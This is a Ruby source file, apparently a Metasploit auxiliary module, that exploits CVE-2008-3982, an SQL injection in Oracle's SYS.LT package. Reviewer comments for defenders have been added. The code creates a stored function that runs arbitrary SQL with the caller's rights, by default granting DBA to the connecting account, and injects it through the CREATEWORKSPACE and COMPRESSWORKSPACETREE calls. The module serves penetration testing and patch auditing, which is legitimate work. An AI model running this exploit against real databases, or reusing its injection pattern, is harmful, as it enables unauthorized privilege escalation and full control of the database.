GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
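# Auxiliary module for CVE-2008-3982: SQL injection in the PL/SQL package
# SYS.LT, reachable by any database account that holds EXECUTE on that package.
#
# Reviewer notes for defenders:
# - The References entry points at the vendor's October 2008 critical patch
#   update advisory; the EXECUTE grant on SYS.LT is the precondition named in
#   the description, so that grant is the thing to audit and restrict.
# - A run creates a one-letter stored function in the connecting account's
#   schema and, with the default SQL option, issues a DBA grant. Both are
#   candidates for DDL / privilege-change auditing where that is enabled.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::ORACLE

  # Registers the module metadata and the optional SQL datastore option.
  #
  # @param info [Hash] metadata passed through to update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle DB SQL Injection via SYS.LT.COMPRESSWORKSPACE',
        'Description' => %q{
          This module exploits an sql injection flaw in the COMPRESSWORKSPACE
          procedure of the PL/SQL package SYS.LT. Any user with execute
          privilege on the vulnerable package can exploit this vulnerability.
        },
        'Author' => [ 'CG' ],
        'License' => MSF_LICENSE,
        'References' =>
          [
            [ 'CVE', '2008-3982'],
            [ 'OSVDB', '49324'],
            [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ]
          ],
        'DisclosureDate' => '2008-10-13'
      )
    )

    register_options(
      [
        # Fixed the typo in the help text ("execte" -> "execute").
        OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]),
      ]
    )
  end

  # Creates a helper function that runs the SQL option, then passes a crafted
  # workspace name to two SYS.LT procedures so the helper is evaluated inside
  # the package's own statement.
  #
  # NOTE(review): the module name and description say COMPRESSWORKSPACE, but
  # the calls below go to CREATEWORKSPACE and COMPRESSWORKSPACETREE; confirm
  # which procedure the advisory actually covers.
  #
  # @return [nil]
  def run
    return unless check_dependencies

    # Random workspace name (1-10 letters) and a one-letter helper function name.
    name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    cruft = Rex::Text.rand_text_alpha_upper(1)

    # AUTHID CURRENT_USER makes the helper run with the privileges of whoever
    # invokes it; the autonomous transaction lets it COMMIT independently of
    # the statement that called it.
    function = "
      CREATE OR REPLACE FUNCTION #{cruft}
      RETURN VARCHAR2 AUTHID CURRENT_USER
      AS
      PRAGMA AUTONOMOUS_TRANSACTION;
      BEGIN
      EXECUTE IMMEDIATE '#{datastore['SQL']}';
      COMMIT;
      RETURN '#{cruft}';
      END;"

    package1 = "BEGIN SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"

    package2 = "BEGIN SYS.LT.COMPRESSWORKSPACETREE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"

    clean = "DROP FUNCTION #{cruft}"

    print_status("Attempting sql injection on SYS.LT.COMPRESSWORKSPACE...")

    print_status("Sending function...")
    prepare_exec(function)

    begin
      prepare_exec(package1)
      prepare_exec(package2)
    rescue => e
      if e.to_s =~ /No Data/
        print_status("Removing function '#{cruft}'...")
        prepare_exec(clean)
      else
        # Previously this branch returned silently. Report the failure and the
        # leftover helper so the tester can remove it from the schema by hand.
        print_error("Unexpected error, function '#{cruft}' was not removed: #{e}")
        return
      end
    end

    # NOTE(review): the helper is dropped only on the 'No Data' path above. If
    # both calls return without raising, it stays in the account's schema and
    # needs manual removal after the test.
  end
end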